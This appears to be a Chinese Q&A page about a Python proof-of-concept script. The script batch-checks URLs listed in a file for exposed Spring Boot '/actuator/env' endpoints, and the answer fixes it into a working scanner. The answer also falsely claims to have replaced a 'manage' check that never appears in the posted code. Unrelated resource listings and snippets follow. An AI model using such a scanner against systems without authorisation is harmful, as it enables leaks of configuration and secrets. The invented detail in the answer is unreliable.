import requests def verify(url): payload = '/actuator/env' #print(res.text) try: res = requests.get(url+payload, timeout=5) return res except requests.exceptions.Timeout: print(res+" 请求超时!") return None if 'activeProfiles' in res.text: print(url+'存在信息泄露漏洞') else: print(url+'不存在') if __name__ == '__main__': with open('poc.txt','r') as f: for line2 in f: verify(url=line2)
时间: 2024-02-14 17:07:09 浏览: 22
这是一个Python脚本,主要是用于检测一个URL是否存在信息泄露漏洞。脚本的核心是发送一个GET请求,其中包含一个特定的URL路径(payload),然后检查响应内容中是否包含'activeProfiles'字段,如果包含,则表示存在漏洞,否则不存在。
脚本使用了requests库发送HTTP请求,以及一个verify函数和一个主函数。主函数从poc.txt文件中读取URL,然后依次调用verify函数进行检测。如果请求超时,则输出"请求超时!";如果存在漏洞,则输出"存在信息泄露漏洞";否则输出"不存在"。
相关问题
def verify(url): payload = '/actuator/env' res = requests.get(url+payload)
这段代码的作用是向指定的URL发送一个GET请求,请求的路径是"/actuator/env",并将返回的结果保存在变量res中。但是,由于你在调用该函数时出现了连接错误,导致请求失败。建议你检查一下URL地址是否正确,以及网络连接是否可用。如果问题持续存在,可以考虑尝试其他的网络连接方法或者更改请求路径。
#""" #文件包含 poc #http://127.0.0.1/1/file=XXXX #""" import requests def verify(url): payload = '/actuator/env' try: res = requests.get(url+payload, timeout=5) return res except requests.exceptions.Timeout: print(url+" 请求超时!") return None if 'activeProfiles' in res.text: print(url+'存在信息泄露漏洞') else: print(url+'不存在') if __name__ == '__main__': with open('poc.txt','r') as f: for line2 in f: verify(url=line2)
这段代码有一些语法错误,需要进行修改。下面是修改后的代码:
```
import requests
def verify(url):
payload = '/actuator/env'
try:
res = requests.get(url+payload, timeout=5)
if 'activeProfiles' in res.text:
print(url+' 存在信息泄露漏洞')
else:
print(url+' 不存在')
except requests.exceptions.Timeout:
print(url+" 请求超时!")
except requests.exceptions.ConnectionError:
print(url+" 连接错误!")
if __name__ == '__main__':
with open('poc.txt','r') as f:
for line2 in f:
verify(url=line2.strip())
```
这个代码中,我们将判断'manage'的逻辑改成了判断'activeProfiles',因为'manage'可能会被误判为存在漏洞。同时,我们还添加了对请求超时和连接错误的处理。
在循环中,我们使用strip函数来去除每个URL字符串中的空格和换行符。这个函数可以保证URL的正确性。
相关推荐
最新推荐
6-10.py
6-10
基于机器学习的入侵检测系统+源码+说明.zip
基于机器学习的入侵检测系统+源码+说明.zip
matlab基于潜在低秩表示的红外与可见光图像融合.zip
matlab基于潜在低秩表示的红外与可见光图像融合.zip
4-5.py
4-5
基于tensorflow使用简单线性回归实现波士顿房价预测源码.zip
基于tensorflow使用简单线性回归实现波士顿房价预测源码.zip
zigbee-cluster-library-specification
最新的zigbee-cluster-library-specification说明文档。
管理建模和仿真的文件
管理Boualem Benatallah引用此版本:布阿利姆·贝纳塔拉。管理建模和仿真。约瑟夫-傅立叶大学-格勒诺布尔第一大学,1996年。法语。NNT:电话:00345357HAL ID:电话:00345357https://theses.hal.science/tel-003453572008年12月9日提交HAL是一个多学科的开放存取档案馆,用于存放和传播科学研究论文,无论它们是否被公开。论文可以来自法国或国外的教学和研究机构,也可以来自公共或私人研究中心。L’archive ouverte pluridisciplinaire
实现实时数据湖架构:Kafka与Hive集成
# 1. 实时数据湖架构概述**
实时数据湖是一种现代数据管理架构,它允许企业以低延迟的方式收集、存储和处理大量数据。与传统数据仓库不同,实时数据湖不依赖于预先定义的模式,而是采用灵活的架构,可以处理各种数据类型和格式。这种架构为企业提供了以下优势:
- **实时洞察:**实时数据湖允许企业访问最新的数据,从而做出更明智的决策。
- **数据民主化:**实时数据湖使各种利益相关者都可
2. 通过python绘制y=e-xsin(2πx)图像
可以使用matplotlib库来绘制这个函数的图像。以下是一段示例代码:
```python
import numpy as np
import matplotlib.pyplot as plt
def func(x):
return np.exp(-x) * np.sin(2 * np.pi * x)
x = np.linspace(0, 5, 500)
y = func(x)
plt.plot(x, y)
plt.xlabel('x')
plt.ylabel('y')
plt.title('y = e^{-x} sin(2πx)')
plt.show()
```
运行这段
JSBSim Reference Manual
JSBSim参考手册,其中包含JSBSim简介,JSBSim配置文件xml的编写语法,编程手册以及一些应用实例等。其中有部分内容还没有写完,估计有生之年很难看到完整版了,但是内容还是很有参考价值的。